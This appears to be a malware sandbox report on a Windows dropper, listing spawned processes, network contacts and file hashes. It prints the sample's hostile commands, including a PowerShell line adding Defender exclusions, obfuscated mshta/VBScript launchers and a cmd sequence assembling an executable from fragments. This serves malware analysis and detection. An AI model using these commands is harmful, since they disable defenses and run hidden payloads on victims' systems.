C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0750d1e499.exe
Sun0750d1e499.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0752b359bd184a.exe
Sun0752b359bd184a.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07778dd9fc6d53.exe
Sun07778dd9fc6d53.exe
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0794d0eebce1.exe
Sun0794d0eebce1.exe
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07be2debb1a.exe
Sun07be2debb1a.exe
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07fcb30681127.exe
Sun07fcb30681127.exe
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07e3a022a8656c5ca.exe
Sun07e3a022a8656c5ca.exe
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07dc9d2dae027.exe
Sun07dc9d2dae027.exe
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07cad998fb20a18.exe
Sun07cad998fb20a18.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 580
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0794d0eebce1.exe
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0794d0eebce1.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3512 -ip 3512
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3512 -s 360
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07cad998fb20a18.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07cad998fb20a18.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07cad998fb20a18.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07cad998fb20a18.exe") do taskkill /F -Im "%~NxU"
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Sun07cad998fb20a18.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4436 -ip 4436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 620
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4436 -ip 4436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4436 -ip 4436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4436 -ip 4436
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff8e364cc40,0x7ff8e364cc4c,0x7ff8e364cc58
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 704
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1932,i,12400694771009641929,10948011954533272136,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1916 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2040,i,12400694771009641929,10948011954533272136,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2084 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2244,i,12400694771009641929,10948011954533272136,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2260 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4436 -ip 4436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 808
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,12400694771009641929,10948011954533272136,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3128 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,12400694771009641929,10948011954533272136,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,12400694771009641929,10948011954533272136,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1684 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4420,i,12400694771009641929,10948011954533272136,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4392 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4436 -ip 4436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4436 -ip 4436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 1060
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4436 -ip 4436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 1132
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4436 -ip 4436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 1284
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4948,i,12400694771009641929,10948011954533272136,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5012 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
C:\Users\Admin\AppData\Local\Temp\e59a86b.exe
"C:\Users\Admin\AppData\Local\Temp\e59a86b.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3552 -ip 3552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 804
C:\Users\Admin\AppData\Local\Temp\e59d4cb.exe
"C:\Users\Admin\AppData\Local\Temp\e59d4cb.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2284 -ip 2284
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 804
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.206.16.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hsiens.xyz | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| NL | 45.133.1.182:80 | tcp | |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| N/A | 127.0.0.1:59978 | tcp | |
| N/A | 127.0.0.1:59980 | tcp | |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | 47.215.142.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | ggg-cl.biz | udp |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | 150.16.251.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ggg-cl.biz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 45.133.1.107:80 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 9.206.16.2.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| NL | 45.9.20.13:80 | tcp | |
| FR | 51.178.186.149:80 | tcp | |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.5.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 45.9.20.13:80 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 72.84.118.132:8080 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 45.9.20.13:80 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\setup_install.exe
| MD5 | 2d62b8cf0d215971e12220d96a099e81 |
| SHA1 | 72e43b82e9510321dbb5130d35d09acd850c7ad8 |
| SHA256 | bec993083a69304244f13e191173e31d23c634567ab21484258195086112aa40 |
| SHA512 | e0763f93143060599658b64cc3c0fa8e8be62c4af2567ab08868492546f200bb5a91b367d2eea296b0a6d71c39a0f0000d71a66aabc1d36664d01dedbfbc5f59 |
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/4820-61-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4820-66-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4820-65-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4820-64-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4820-63-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4820-59-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4820-60-0x0000000064941000-0x000000006494F000-memory.dmp
memory/4820-57-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4820-58-0x0000000000CD0000-0x0000000000D5F000-memory.dmp
memory/4820-56-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4820-55-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4820-54-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4820-53-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4820-62-0x0000000064940000-0x0000000064959000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/4820-49-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/4820-70-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4820-71-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/4820-69-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4820-67-0x0000000000400000-0x000000000051C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07be2debb1a.exe
| MD5 | 7908fc00709580c4e12534bcd7ef8aae |
| SHA1 | 616616595f65c8fdaf1c5f24a4569e6af04e898f |
| SHA256 | 55fc7e624b75a66d04ed1dfc8d6957ceb013db94e9be29e779280378011d1399 |
| SHA512 | 0d5a72410d628d3bf6ff9188a69f378e04184ed603a620659f4084bd8a5a392577849c5aa895706eec5213b0036d24faafb8e153b458b5f53d8da7ce636b7a00 |
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07cad998fb20a18.exe
| MD5 | 7c6b2dc2c253c2a6a3708605737aa9ae |
| SHA1 | cf4284f29f740b4925fb2902f7c3f234a5744718 |
| SHA256 | b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba |
| SHA512 | 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07 |
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0741b6b6c3.exe
| MD5 | f75e29fdd8803d46736be53a119c0814 |
| SHA1 | e75af0dd2e15043e49684e599bd76f037abbee64 |
| SHA256 | fe9cac8ff86d68feb4e76f8bc04c345e767353feed2a5fe8c98cc9a42b8739af |
| SHA512 | 223587ca8c9974976f07a683607cabf9e6414878121be48a4831ce7b5c2bbde7dcfc3dd6454999c135952fddc307d99b47c008a5417d3ab91b58775a6dc92b12 |
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun075246a0bffeab.exe
| MD5 | 118cf2a718ebcf02996fa9ec92966386 |
| SHA1 | f0214ecdcb536fe5cce74f405a698c1f8b2f2325 |
| SHA256 | 7047db11a44cfcd1965dcf6ac77d650f5bb9c4282bf9642614634b09f3dd003d |
| SHA512 | fe5355b6177f81149013c444c244e540d04fbb2bcd2bf3bb3ea9e8c8152c662d667a968a35b24d1310decb1a2db9ac28157cda85e2ef69efee1c9152b0f39089 |
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0794d0eebce1.exe
| MD5 | 0f1ef1bad121bd626d293df70f9c73f8 |
| SHA1 | 790d44990c576d1da37e535a447dc6b7270b4ca2 |
| SHA256 | 327e9994d62d8a1042f96db61359c9258ebc9c703f9a536801da79b196c221d3 |
| SHA512 | b626ccadfd53383a1f18d4604b4adac6ac5a0bd010089be26dd026e4a44f565813cff3711cc9343c9112a6cbcdcff208d209fba9e94f1103746e50af83be171b |
memory/4820-96-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2836-107-0x00000000000A0000-0x0000000000112000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07dc9d2dae027.exe
| MD5 | 69f0fe993f6e63c9e7a2b739ec956e82 |
| SHA1 | 6f9a1b7a9fceac26722da17e204f57a47d7b66a5 |
| SHA256 | ee4355899a94ed5b369d8a8851d52ef2286c01af577e70bc82f43a5f4716fb0b |
| SHA512 | 1f81e0b8c3a5748a2aa47e02f8b1c1fc09e8d81871a607a148343ac3c579b82685f41eddf2070976a31aabccef0e70303c05d30e0c78c287a5c478c886185b1a |
memory/4440-111-0x0000000005970000-0x0000000005F98000-memory.dmp
memory/4440-110-0x00000000051A0000-0x00000000051D6000-memory.dmp
memory/2836-109-0x0000000004920000-0x0000000004996000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07fcb30681127.exe
| MD5 | 4a01f3a6efccd47150a97d7490fd8628 |
| SHA1 | 284af830ac0e558607a6a34cf6e4f6edc263aee1 |
| SHA256 | e29476ee4544a426c1518728034242be3e6821f79378ae2faffedecc194c5a97 |
| SHA512 | 4d0e886e3227f09c177f1a9836ee65766aafc7f48458c944da1afc061106dfbbf47455e54065d22de955b44044817ac900ee9ac80b434ad73bf53262acb49519 |
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07e3a022a8656c5ca.exe
| MD5 | b7ed5241d23ac01a2e531791d5130ca2 |
| SHA1 | 49df6413239d15e9464ed4d0d62e3d62064a45e9 |
| SHA256 | 98ac9097e514852804ca276aac3a319b07acf7219aef34e0d4fff6ea5b094436 |
| SHA512 | 1e4402c695a848bd62f172bd91eb3a4df8067c1fbc5f95dfd601d7a8c24ad81ac2e1f2e1280160087da8c8fbb72e957259661d759d8f7d9317cef3c64429a126 |
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0752b359bd184a.exe
| MD5 | aee0df0b273236965ad033c9a4be275f |
| SHA1 | ac8124f037441434c9881a2649e2e62bf276b1a6 |
| SHA256 | 622752355b43c5c019c6242b40c93288006b61fea2039d467bff1ac9c7e4dd85 |
